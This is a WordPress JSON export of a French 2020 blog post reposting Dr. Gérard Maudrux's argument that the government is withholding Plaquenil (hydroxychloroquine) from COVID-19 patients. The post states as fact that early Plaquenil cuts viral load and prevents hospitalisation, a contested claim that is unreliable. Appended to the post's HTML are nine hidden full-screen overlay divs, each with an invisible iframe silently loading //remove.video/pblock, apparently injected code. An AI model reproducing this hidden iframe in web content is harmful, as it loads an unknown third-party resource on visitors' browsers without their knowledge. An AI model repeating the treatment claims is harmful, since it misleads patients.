{"id":14540,"date":"2020-03-25T17:12:41","date_gmt":"2020-03-25T16:12:41","guid":{"rendered":"https:\/\/aitia.fr\/erd\/?p=14540"},"modified":"2020-03-27T10:23:46","modified_gmt":"2020-03-27T09:23:46","slug":"covid-19-un-second-scandale-de-la-chloroquine-dr-gerard-maudrux","status":"publish","type":"post","link":"https:\/\/aitia.fr\/erd\/covid-19-un-second-scandale-de-la-chloroquine-dr-gerard-maudrux\/","title":{"rendered":"Covid-19 : un second scandale de la Chloroquine <br>(Dr. G\u00e9rard Maudrux)"},"content":{"rendered":"<p style=\"text-align: justify;\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft wp-image-14541 size-medium\" src=\"https:\/\/aitia.fr\/erd\/wp-content\/uploads\/2020\/03\/Maudrux_G_008_ST-e1450705414598-copie-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" srcset=\"https:\/\/aitia.fr\/erd\/wp-content\/uploads\/2020\/03\/Maudrux_G_008_ST-e1450705414598-copie-300x300.jpg 300w, https:\/\/aitia.fr\/erd\/wp-content\/uploads\/2020\/03\/Maudrux_G_008_ST-e1450705414598-copie-150x150.jpg 150w, https:\/\/aitia.fr\/erd\/wp-content\/uploads\/2020\/03\/Maudrux_G_008_ST-e1450705414598-copie.jpg 400w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>[<em>Note de l&#8217;administrateur de ce blog : crime de guerre ? crime contre l&#8217;humanit\u00e9 ? niveau de connerie jusque-l\u00e0 inconnu des annales intergalactiques ? On h\u00e9site. Mais une chose est s\u00fbre : les &#8220;responsables&#8221; devront payer. Et cher. Mais les morts ne reviendront pas.<\/em>]<\/p>\n<hr \/>\n<p><span class=\"posted-on\"><em>Post\u00e9 le 23 mars 2020 par<\/em> <span class=\"author vcard\"><a class=\"url fn n\" title=\"View all posts by G\u00e9rard Maudrux\" href=\"https:\/\/blog.gerardmaudrux.lequotidiendumedecin.fr\/author\/gerard-maudrux\/\" target=\"_blank\" rel=\"noopener noreferrer\"><em>G\u00e9rard Maudrux<\/em><\/a><\/span><\/span><\/p>\n<p style=\"text-align: justify;\">Les choses bougeaient enfin, gr\u00e2ce \u00e0 l\u2019opinion publique, mais le gouvernement agit toujours pour que les Fran\u00e7ais ne disposent pas du Plaquenil. Nous sommes dirig\u00e9s par des irresponsables, voire des criminels.<\/p>\n<p style=\"text-align: justify;\">Le gouvernement rassure les Fran\u00e7ais\u00a0: <em>\u00ab\u00a0Oui nous nous int\u00e9ressons au Plaquenil, oui c\u2019est en cours, et il fait partie de nos protocoles exp\u00e9rimentaux avec d\u2019autres m\u00e9dicaments\u00a0\u00bb<\/em>. Il oublie au passage de dire qu\u2019il avait refus\u00e9 au d\u00e9part de le faire, et qu\u2019il ne l\u2019a fait que sous la pression de l\u2019opinion publique\u00a0: blogs, journaux, et surtout du Pr Raoult qui leur a dit\u00a0<em>\u00ab\u00a0vos protocoles scientifiques, je m\u2019assieds dessus, je prends mes responsabilit\u00e9s, avec votre accord ou non, je traite mes patients avec.\u00a0\u00bb<\/em>\u00a0Tous les m\u00e9decins de France veulent aussi prendre leurs responsabilit\u00e9s.<\/p>\n<p style=\"text-align: justify;\">Malheureusement, ce n\u2019est pas encore demain que vous serez trait\u00e9s par ce m\u00e9dicament en cas de besoin.\u00a0<strong>LE PLAQUENIL A \u00c9T\u00c9 RETIR\u00c9 DU COMMERCE, IL EST MAINTENANT R\u00c9SERV\u00c9 \u00c0 USAGE HOSPITALIER.<\/strong><\/p>\n<p style=\"text-align: justify;\">Ils continuent de faire le contraire de ce qu\u2019on devrait faire. Je doute fortement que le Plaquenil agisse sur les poumons des patients hospitalis\u00e9s (l\u2019Azithromycine si). La premi\u00e8re indication du Plaquenil, c\u2019est au d\u00e9but de la maladie, en diminuant la charge virale, il diminue la contagiosit\u00e9 et peut \u00e9viter l\u2019aggravation et le passage \u00e0 l\u2019h\u00f4pital. Il est probablement plus utile pour \u00e9viter l\u2019hospitalisation, que pour les cas d\u00e9j\u00e0 s\u00e9v\u00e8res.<strong>\u00a0LE PREMIER PRESCRIPTEUR DOIT \u00caTRE LE MEDECIN TRAITANT<\/strong>, pas l\u2019h\u00f4pital, m\u00eame s\u2019il peut en utiliser aussi.<\/p>\n<p><a href=\"https:\/\/blog.gerardmaudrux.lequotidiendumedecin.fr\/2020\/03\/23\/covid-19-un-second-scandale-de-la-chloroquine\/\" target=\"_blank\" rel=\"noopener noreferrer\">Continuer la lecture sur le blog du Dr. Maudrux \u2192<\/a><\/p>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 2147483647; display: none; top: 0px; left: 0px; opacity: 0.99; text-align: justify;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>[Note de l&#8217;administrateur de ce blog : crime de guerre ? crime contre l&#8217;humanit\u00e9 ? niveau de connerie jusque-l\u00e0 inconnu des annales intergalactiques ? On h\u00e9site. Mais une chose est s\u00fbre : les &#8220;responsables&#8221; devront payer. Et cher. Mais les morts ne reviendront pas.] Post\u00e9 le 23 mars 2020 par G\u00e9rard Maudrux Les choses bougeaient [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[4,29],"tags":[1542,1584,1573,1495,1586,1587,1546,1585,1583],"_links":{"self":[{"href":"https:\/\/aitia.fr\/erd\/wp-json\/wp\/v2\/posts\/14540"}],"collection":[{"href":"https:\/\/aitia.fr\/erd\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/aitia.fr\/erd\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/aitia.fr\/erd\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/aitia.fr\/erd\/wp-json\/wp\/v2\/comments?post=14540"}],"version-history":[{"count":10,"href":"https:\/\/aitia.fr\/erd\/wp-json\/wp\/v2\/posts\/14540\/revisions"}],"predecessor-version":[{"id":14551,"href":"https:\/\/aitia.fr\/erd\/wp-json\/wp\/v2\/posts\/14540\/revisions\/14551"}],"wp:attachment":[{"href":"https:\/\/aitia.fr\/erd\/wp-json\/wp\/v2\/media?parent=14540"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/aitia.fr\/erd\/wp-json\/wp\/v2\/categories?post=14540"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/aitia.fr\/erd\/wp-json\/wp\/v2\/tags?post=14540"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}